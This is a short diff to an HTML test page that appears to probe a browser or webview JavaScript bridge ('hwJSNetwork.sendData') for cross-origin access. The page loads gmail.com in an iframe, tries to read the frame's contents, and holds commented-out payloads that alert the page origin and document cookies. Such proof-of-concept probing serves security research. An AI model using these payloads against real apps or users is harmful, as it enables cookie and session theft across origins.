--- a/try.html
+++ b/try.html
@@ -1,1 +1,13 @@
-alert(document.location.origin)
+<html>
+<body>
+<iframe onload="hwJSNetwork.sendData('https://gmail.com', 'GET', '', '', 'nothing');" src="https://gmail.com"></iframe>
+<script>
+	var frame = document.querySelector('iframe');
+	var ret = frame.contentWindow || frame.contentDocument;
+	console.log(ret);
+	//var ret = hwJSNetwork.sendData('https://gmail.com', 'GET', '', '', 'nothing');
+//var blob = new Blob(['<iframe onload=alert(this.contentWindow.document.cookie) src=#></iframe>'], {type: "text/html"});
+//location.href=URL.createObjectURL(blob);
+</script>
+</body>
+</html>
